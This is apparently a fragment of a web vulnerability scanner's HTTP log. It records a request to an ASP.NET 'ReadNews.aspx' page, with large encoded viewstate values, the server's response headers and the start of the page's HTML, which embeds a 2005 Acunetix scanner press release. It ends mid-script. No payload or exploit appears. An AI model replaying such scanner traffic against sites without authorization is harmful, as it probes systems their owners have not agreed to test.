waW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30581
Response Body - size: 30,581 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) 